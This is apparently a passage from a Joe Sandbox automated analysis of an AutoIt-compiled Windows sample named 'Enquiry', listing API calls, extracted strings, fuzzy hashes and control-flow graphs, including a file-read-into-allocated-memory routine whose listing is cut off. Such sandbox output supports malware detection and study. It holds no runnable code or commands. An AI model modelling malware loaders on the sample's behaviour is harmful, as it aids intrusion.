                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: IsThemeActive$uxtheme.dll
                            • API String ID: 2574300362-3542929980
                            • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                            • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                            • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                            • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                            • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                            • TranslateMessage.USER32(?), ref: 00409556
                            • DispatchMessageW.USER32(?), ref: 00409561
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Message$Peek$DispatchSleepTranslate
                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                            • API String ID: 1762048999-758534266
                            • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                            • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                            • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                            • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                            Control-flow Graph

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • __wcsicoll.LIBCMT ref: 00402007
                            • __wcsicoll.LIBCMT ref: 0040201D
                            • __wcsicoll.LIBCMT ref: 00402033
                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                            • __wcsicoll.LIBCMT ref: 00402049
                            • _wcscpy.LIBCMT ref: 0040207C
                            • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                            • API String ID: 3948761352-1609664196
                            • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                            • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                            • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                            • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                            • __wsplitpath.LIBCMT ref: 0040E41C
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • _wcsncat.LIBCMT ref: 0040E433
                            • __wmakepath.LIBCMT ref: 0040E44F
                              • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • _wcscpy.LIBCMT ref: 0040E487
                              • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                            • _wcscat.LIBCMT ref: 00427541
                            • _wcslen.LIBCMT ref: 00427551
                            • _wcslen.LIBCMT ref: 00427562
                            • _wcscat.LIBCMT ref: 0042757C
                            • _wcsncpy.LIBCMT ref: 004275BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                            • String ID: Include$\
                            • API String ID: 3173733714-3429789819
                            • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                            • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                            • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                            • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                            Control-flow Graph

                            APIs
                            • _fseek.LIBCMT ref: 0045292B
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                            • __fread_nolock.LIBCMT ref: 00452961
                            • __fread_nolock.LIBCMT ref: 00452971
                            • __fread_nolock.LIBCMT ref: 0045298A
                            • __fread_nolock.LIBCMT ref: 004529A5
                            • _fseek.LIBCMT ref: 004529BF
                            • _malloc.LIBCMT ref: 004529CA
                            • _malloc.LIBCMT ref: 004529D6
                            • __fread_nolock.LIBCMT ref: 004529E7
                            • _free.LIBCMT ref: 00452A17
                            • _free.LIBCMT ref: 00452A20
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                            • String ID:
                            • API String ID: 1255752989-0
                            • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                            • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                            • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                            • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __fread_nolock$_fseek_wcscpy
                            • String ID: FILE
                            • API String ID: 3888824918-3121273764
                            • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                            • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                            • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                            • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                            • RegisterClassExW.USER32(00000030), ref: 004104ED
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                            • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                            • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                            • ImageList_ReplaceIcon.COMCTL32(00BA0308,000000FF,00000000), ref: 00410552
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 2914291525-1005189915
                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                            • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                            • LoadIconW.USER32(?,00000063), ref: 004103C0
                            • LoadIconW.USER32(?,000000A4), ref: 004103D3
                            • LoadIconW.USER32(?,000000A2), ref: 004103E6
                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                            • RegisterClassExW.USER32(?), ref: 0041045D
                              • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                              • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                              • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                              • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                              • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                              • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                              • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00BA0308,000000FF,00000000), ref: 00410552
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                            • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                            • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                            • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _malloc
                            • String ID: Default
                            • API String ID: 1579825452-753088835
                            • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                            • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                            • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                            • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2050 40f696-40f69c 2048->2050 2051 40f660-40f674 call 4150d1 2049->2051 2052 40f63e 2049->2052 2055 40f679-40f67c 2051->2055 2054 40f640 2052->2054 2056 40f642-40f650 2054->2056 2055->2045 2057 40f652-40f655 2056->2057 2058 40f67e-40f68c 2056->2058 2061 40f65b-40f65e 2057->2061 2062 425d1e-425d3e call 4150d1 call 414d04 2057->2062 2059 40f68e-40f68f 2058->2059 2060 40f69f-40f6ad 2058->2060 2059->2057 2064 40f6b4-40f6c2 2060->2064 2065 40f6af-40f6b2 2060->2065 2061->2051 2061->2054 2072 425d43-425d5f call 414d30 2062->2072 2067 425d16 2064->2067 2068 40f6c8-40f6d6 2064->2068 2065->2057 2067->2062 2070 425d05-425d0b 2068->2070 2071 40f6dc-40f6df 2068->2071 2070->2056 2073 425d11 2070->2073 2071->2057 2072->2050 2073->2067
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __fread_nolock_fseek_memmove_strcat
                            • String ID: AU3!$EA06
                            • API String ID: 1268643489-2658333250
                            • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                            • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                            • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                            • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2080 401144-40114a 2077->2080 2081 40111b-40111e 2077->2081 2078->2077 2079 401182 2078->2079 2085 40112c-401141 DefWindowProcW 2079->2085 2083 401184-40118e call 401250 2080->2083 2084 40114c-40114f 2080->2084 2081->2080 2082 401120-401126 2081->2082 2082->2085 2086 42b038-42b03f 2082->2086 2093 401193-40119a 2083->2093 2087 401151-401157 2084->2087 2088 40119d 2084->2088 2086->2085 2092 42b045-42b059 call 401000 call 40e0c0 2086->2092 2090 401219-40121f 2087->2090 2091 40115d 2087->2091 2094 4011a3-4011a9 2088->2094 2095 42afb4-42afc5 call 40f190 2088->2095 2090->2082 2099 401225-42b06d call 468b0e 2090->2099 2097 401163-401166 2091->2097 2098 42b01d-42b024 2091->2098 2092->2085 2094->2082 2096 4011af 2094->2096 2095->2093 2096->2082 2102 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2096->2102 2103 4011db-401202 SetTimer RegisterWindowMessageW 2096->2103 2105 42afe9-42b018 call 40f190 call 401a50 2097->2105 2106 40116c-401172 2097->2106 2098->2085 2104 42b02a-42b033 call 4370f4 2098->2104 2099->2093 2103->2093 2112 401204-401216 CreatePopupMenu 2103->2112 2104->2085 2105->2085 2106->2082 2114 401174-42afde call 45fd57 2106->2114 2114->2085 2127 42afe4 2114->2127 2127->2093
                            APIs
                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                            • CreatePopupMenu.USER32 ref: 00401204
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                            • String ID: TaskbarCreated
                            • API String ID: 129472671-2362178303
                            • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                            • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                            APIs
                            • _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                            • std::exception::exception.LIBCMT ref: 00411626
                            • std::exception::exception.LIBCMT ref: 00411640
                            • __CxxThrowException@8.LIBCMT ref: 00411651
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                            • String ID: ,*H$4*H$@fI
                            • API String ID: 615853336-1459471987
                            • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                            • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                            • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                            • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2147 413da20-413dace call 413b440 2150 413dad5-413dafb call 413e930 CreateFileW 2147->2150 2153 413db02-413db12 2150->2153 2154 413dafd 2150->2154 2162 413db14 2153->2162 2163 413db19-413db33 VirtualAlloc 2153->2163 2155 413dc4d-413dc51 2154->2155 2156 413dc93-413dc96 2155->2156 2157 413dc53-413dc57 2155->2157 2159 413dc99-413dca0 2156->2159 2160 413dc63-413dc67 2157->2160 2161 413dc59-413dc5c 2157->2161 2164 413dca2-413dcad 2159->2164 2165 413dcf5-413dd0a 2159->2165 2166 413dc77-413dc7b 2160->2166 2167 413dc69-413dc73 2160->2167 2161->2160 2162->2155 2168 413db35 2163->2168 2169 413db3a-413db51 ReadFile 2163->2169 2170 413dcb1-413dcbd 2164->2170 2171 413dcaf 2164->2171 2172 413dd1a-413dd22 2165->2172 2173 413dd0c-413dd17 VirtualFree 2165->2173 2174 413dc8b 2166->2174 2175 413dc7d-413dc87 2166->2175 2167->2166 2168->2155 2176 413db53 2169->2176 2177 413db58-413db98 VirtualAlloc 2169->2177 2180 413dcd1-413dcdd 2170->2180 2181 413dcbf-413dccf 2170->2181 2171->2165 2173->2172 2174->2156 2175->2174 2176->2155 2178 413db9a 2177->2178 2179 413db9f-413dbba call 413eb80 2177->2179 2178->2155 2187 413dbc5-413dbcf 2179->2187 2184 413dcea-413dcf0 2180->2184 2185 413dcdf-413dce8 2180->2185 2183 413dcf3 2181->2183 2183->2159 2184->2183 2185->2183 2188 413dc02-413dc16 call 413e990 2187->2188 2189 413dbd1-413dc00 call 413eb80 2187->2189 2195 413dc1a-413dc1e 2188->2195 2196 413dc18 2188->2196 2189->2187 2197 413dc20-413dc24 